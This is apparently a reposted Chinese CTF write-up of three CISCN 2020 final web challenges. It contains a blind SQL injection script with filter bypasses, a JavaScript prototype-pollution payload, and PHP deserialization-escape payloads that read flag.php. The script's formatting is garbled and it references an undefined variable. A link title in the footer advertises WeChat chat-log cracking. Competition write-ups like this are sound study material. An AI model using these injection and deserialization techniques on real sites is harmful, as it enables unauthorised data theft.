对ciscn final的web的小解析

访客4年前黑客文章614
本文首发于“合天智汇”公众号 作者:HhhM
web1
输入1点击输入框后会显示如下参数:
?id=1&limit=1
看下源码能得到这么两句sql语句:
<!-- $query="SELECT * FROM fake_flag WHERE id=$id limit 0,$limit"; //$query="SELECT flag FROM real_flag WHERE id=$id limit 0,$limit"; -->
会发现左右过滤不相同,尝试如下可以把limit语句注释掉:
id=1
此时sql语句变成:
SELECT * FROM fake_flag WHERE id=1可控内容
空格被过滤了,可以考虑 或 来绕过,因此输入如下会发现语句执行成功:
?id=-1or%0a1
or 1=1发现等于号被过滤,fuzz一下能得到部分可用函数,且左边没有过滤减号:
ord mid group_concat
过滤逗号可以采用from(1)for(1)的形式来绕过。
盲注脚本:
# conding=utf-8# ciscn2020 web1 blindimportrequests req =requests.session()url ="http://ip:port/?id={0}&limit={1}"defcommonGET():payload1 ="-1 or {0}-ord(mid((select group_concat(flag) from(real_flag))from({0})for(1)))"chars ='-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'result =""fori inrange(1,50):forj inchars:payload3 =payload1.format(ord(j))payload4 =payload2.format(i)url1 =url.format(payload3,payload4)rep =req.get(url1)text =rep.text # print(text)if"searched nothing"intext:result +=j print(result)commonGET()
web2
比赛没咋看这个题,源码只存了个app.js跑不起来就没复现,大概看了一下是原型链污染。
player是一个字典,注意到:
因为monster也是一个字典,且存在hp,并且我们是先攻击怪兽,因此我们污染buff的话就可以一刀秒了boss,然后就是用这一个循环进行污染:
传入:
{“__proto__“:{“buff”: 1000}}
那么就会把玩家的buff污染为1000,那么看到伤害的计算:
攻击+buff,也就是说这里就可以让玩家攻击无限大直接秒了boss了。
本地测试可以发现如下:
打败boss即可getflag。
web3
Web3其实考了两个点一个是反序列化逃逸,一个是反序列化串中的s替换为S时可以把字符串用16进制表示,个人感觉这个题其实就是0ctfpiapiapia+强网杯2020的web辅助。
wwwroot.zip源码泄露。
给了一个user类,逃逸点在于:
privatefunctionwaf($string){$waf='/phar|file|gopher|http|sftp|flag/i';returnpreg_replace($waf,'index',$string);}
至于从哪里进行序列化串的传入,看到:
先说我们传入的虽然是一个数组, 但因为waf处如果我们传入一个flag,就会被替换为index,此时长度差为1。
在这里会把我们的序列化串waf后再反序列化,我们利用它可以逃逸出来一个user对象。
waf的话可以使用s替换为S以此使用16进制来表示flag.php来绕过,这一个过滤限制了我们只能使用old_password字段,否则的话可以采用gopher替换为index来吃掉部分序列化串。
需要伪造的序列化串为这么一串东西,长度为196,所以这里需要196个flag替换为index:
本地模拟一下过waf会发现这里长度980其实就是index的长度总和:
那么余下的序列化串理所当然就逃逸出去了。
update_username=1&old_password=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:1:"1";O:4:"User":6:{S:8:"username";s:1:"1";S:8:"password";s:1:"1";s:3:"age";s:1:"1";s:5:"email";s:1:"1";S:12:"\00User\00avatar";S:8:"\66\6C\61\67\2E\70\68\70";S:13:"\00User\00content";s:0:"";}&update_password=123&update_age=1&update_email=231@qq.com
当然了如果没有前面对字段的格式过滤,也可以采用如下的payload:
update_username=1&old_password=1&update_password=1&update_email=";s:5:"email";'.'O:4:"User":6:{S:8:"username";s:1:"1";S:8:"password";s:1:"1";s:3:"age";s:1:"1";s:5:"email";s:1:"1";S:12:"\00User\00avatar";S:8:"\66\6C\61\67\2E\70\68\70";S:13:"\00User\00content";s:0:"";}&update_age=gophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergophergopher

相关文章

大名鼎鼎的黑客隐姓埋名当司机(那些曾经大名鼎鼎的黑客,现在怎么样了?)

大名鼎鼎的黑客隐姓埋名当司机(那些曾经大名鼎鼎的黑客,现在怎么样了?)

本文导读目录: 1、你觉得什么是真正的黑客? 2、如何看待互联网大厂程序员因厌恶编程,辞去月薪2w+的工作去当司机? 3、世界上大名鼎鼎的黑客都做过哪些让人非常震惊的事情? 4、世界黑客名...

破解别人微信聊天记录软件(目前最简单有效的方法)_微信聊天记录

破解别人微信聊天记录软件(目前最简单有效的方法),怎样规复微信删除的谈天纪录?时常听到密友吐槽,以前每次查微信谈天纪录,都发掘内部的图片或视频无法加载。这是由于我清算了手机内存。我觉得不删除对话窗口,...

如何练习盲打(迅速教你学会盲打)

如何练习盲打(迅速教你学会盲打)

如何练习盲打(迅速教你学会盲打)盲打是指在电脑上打字的时候不看键盘。盲打是打字员的基本要求,要想具有一定的打字速度,必须学会盲打。盲打要求打字的人对于键盘有很好的定位能力。练习盲打的最基本方法是记住键...

中国代表在联合国崔始源韩国节目提刘雯介绍中国人权事业成就

  中新社联合国10月6日电 中国常驻联合国代表张军大使6日在第75届联合国大会第三委员会发言,介绍了中国人权事业的历史性成就。   张军指出,新中国成立71年来,中华民族实现了站起来、富起来、强起...

小食代零食前景好吗?加盟怎么样?

小食代零食前景好吗?加盟怎么样?

首先各人可以或许存眷到小食代零食加盟项目,就说明各人对付零食行业长短常感乐趣的,而且也长短常有目光的,那么小食代零食前景好吗?加盟怎么样?说到这个项目标加盟优势,其实长短常多的,假如我们从大的方面来讲...

宝宝过敏和辅食有关系吗 过敏宝宝如何添加辅食

宝宝过敏和辅食有关系吗 过敏宝宝如何添加辅食

小孩过敏和宝宝辅食有关系吗 皮肤过敏小宝宝怎样辅食添加。许多父母在给孩子加宝宝辅食的情况下了解应遵照从“单一→丰富多彩”这一标准加上,主要是防止另外加上多种多样宝宝辅食,不然当小宝宝出現皮肤过敏状况...